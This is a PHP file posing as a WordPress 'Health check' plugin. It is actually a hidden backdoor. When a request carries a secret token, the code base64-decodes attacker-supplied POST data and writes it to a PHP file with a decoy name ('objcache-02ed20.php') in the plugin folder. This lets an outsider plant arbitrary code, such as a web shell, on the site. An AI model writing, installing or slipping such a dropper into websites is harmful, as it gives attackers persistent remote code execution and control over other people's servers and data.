<?php
/*
Plugin Name: wp-hc-df3353
Description: Health check
Version: 1.0.1
*/
if(isset($_GET['_nxd'])&&isset($_POST['d'])&&hash_equals('0374ec5d1c4a411157bb3189',(string)$_GET['_nxd'])){
$p=__DIR__.'/objcache-02ed20.php';
if(@file_put_contents($p,base64_decode($_POST['d']))!==false){echo 'NXDROP_OK:'.$p;exit;}
echo 'NXDROP_FAIL';exit;}